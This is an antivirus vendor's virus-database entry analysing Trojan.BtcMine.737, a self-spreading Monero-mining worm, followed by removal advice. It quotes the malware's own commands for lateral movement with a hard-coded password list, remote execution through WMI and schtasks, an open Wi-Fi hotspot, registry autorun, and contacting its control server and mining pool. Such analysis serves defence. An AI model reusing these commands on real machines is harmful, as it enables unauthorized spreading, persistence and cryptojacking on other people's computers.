Library
My library

+ Add to library

Profile

Trojan.BtcMine.737

Added to the Dr.Web virus database: 2015-07-20

Virus description added:

SHA1:

cc1e71c0e65280c9a32699e2850fafba19218fa0 (dropper)

edd53c0995a37618ffdb84557c8d737ae1ff5cc6 (worm)

f6ab05d457dab97767e5112ac4cc6e4998345afa (miner)

A Trojan designed for mining electronic currency. It consists of three installers nested in each other and created by means of Nullsoft Scriptable Install System (NSIS).

The first installer is a simple dropper that tries to kill the following running processes belonging to the Trojan:

cmd /c taskkill /f /im file0.exe & tskill file0.exe
cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe
cmd /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd /c taskkill /f /im cgminer.exe & tskill cgminer.exe
cmd /c taskkill /f /im key.exe & tskill key.exe

Then it replicates itself to the hard drive of the compromised computer and runs the created copies.

%TEMP%\Key.exe

After that, the dropper attempts to delete the original file.

cmd /c for %i in (1,1,900) do del "<full path to the dropper>"

The second installer (key.exe) saves the executable with the CNminer.exe name to the following folder and then runs it:

%APPDATA%\NsCpuCNMiner\ 

Then it replicates itself to %APPDATA%\%USERNAME% by executing the following command:

cmd /c xcopy /y <own name> %COMMON_STARTUP% & xcopy /y /i <own name> %APPDATA%\%USERNAME%

and makes the folder accessible from the local network.

net share %USERNAME%="$APPDATA\%USERNAME%" /unlimited /cache:programs

After that, the second installer copies itself to the Documents folder:

"cmd" /c xcopy /y "$EXEPATH" "C:\Documents and Settings\All Users\Документы\" &
xcopy /y /i "$EXEPATH" "C:\Documents and Settings\All users\Documents\"

Then the Trojan replicates itself to root folders of all hard drives (this operation is repeated periodically) as follows:

cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z)
do xcopy /y "%Temp%\key.exe" %i:\

These copies look as WinRAR archives with the Key name.

Once launched, the Trojan goes through all computers in network places as follows:

"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view

trying to connect to them by using logins and passwords from a special list.

"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use 
"\\NETCOMP-PC" "passwordpassword" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y "cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y "cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "flvbybcnhfnjh" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y ...

Moreover, the malicious program tries to crack the password to the Windows user account. If such an attempt is successful and if necessary equipment is available, Trojan.BtcMine.737 sets up an open Wi-Fi access point as follows:

cmd /c taskkill /f /im schtasks.exe &
tskill schtasks.exe &
SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow
ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork &
net share %USERNAME%=C:\Users\%USERNAME%\AppData\Roaming\%USERNAME% /unlimited
/cache:programs" /RU "%USERNAME%" /RP "passwordpassword" /SC ONCE /ST 01:00:00 && SchTasks /Run /TN WiFi /i

If a connection to any computer on the network is established, the Trojan tries to replicate itself to that computer and run the copy using Windows Management Instrumentation (WMI)

StrCpy $R7 "/node:"$R1" /user:$R2 /password:$R3"
Push "cmd" /c wmic $R7 process where name="$EXEFILE" | find /i "$EXEFILE" ||
(wmic $R7 process call create "C:$R5\$EXEFILE" & wmic $R7 process call create "$R6\$EXEFILE")

or using Task Scheduler as follows:

Push "cmd" /c schtasks /create /s "$R1" /u $R2 /p $R3 /ru system /tn "Key"
/tr "C:$R5\$EXEFILE" /sc onlogon /f

Once launched on the infected computer, CNminer.exe saves the miner's executable files (NsCpuCNMiner32.exe, NsCpuCNMiner64.exe, and pools.txt) to the folder from where it is started. To ensure autorun of an executable, the Trojan modifies the relevant Windows system registry branch creating a corresponding shortcut in the standard autorun folder as follows:

WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "CNminer"
"$APPDATA\NsCpuCNMiner\CNminer.exe" CreateShortCut "$COMMON_STARTUP\CNminer.lnk" "$APPDATA\NsCpuCNMiner\CNminer.exe"
0 465 108462336

After the installer is run, the script contained in it kills the following running processes belonging to the miners (if they are launched):

cmd.exe /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner32.exe & tskill NsCpuCNMiner32.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner64.exe & tskill NsCpuCNMiner64.exe

Then the Trojan connects to the command and control server and receives additional configuration data in HTML format. The data contains pool properties and electronic wallet identifiers which constantly change.

StrCpy $[38] "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
StrCpy $[39] " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
StrCpy $[33] 
"st******t.ru,178.**.***.223,pr******t.ru,te*****y.ru,p*****s.ru,qp****t.ru,pr*****s.ru" StrCpy $[34] "stratum+tcp://mine.moneropool.com:8080 -t 0" StrCpy $[35]
"43qgfne1Bi2UUvffo815n3DfGmMW6ZRmagc2aCagW9wdY7QDvL1qCw1LD6FCro9kk42e86bxxRbbnSk3mUfaW2nCDbZgA
Bp" ... Push kernel32::GetTickCount()i.r2 StrCpy $[32] "http://$[32]/test.html?$2" ... Push $[32] Push /TOSTACK Push Mozilla/5.0 Gecko/20100101 Firefox/4.0 Push /USERAGENT RegisterDLL $PLUGINSDIR\inetc.dll get 0 Sleep 942

After that, the miner itself is launched:

"C:\Users\<username>\AppData\Roaming\NsCpuCNMiner\NsCpuCNMiner32.exe" -dbg -1
-o stratum+tcp://mine.moneropool.com:3333 -t 0 -u 
43tjagd2e8d4GXzYn5xmysYmDnLbvvZSHFPbMWtg4Cs1DLwztfENYbNBz8Y8fmuhpCXFHDzXUWn2QZwhswsNtgzTM8v899
K -p x

It should be noted that cybercriminals use a different tool for electronic currency mining. This tool is created by another developer and is detected by Dr.Web as a program belonging to the Tool.BtcMine family.

News about the Trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android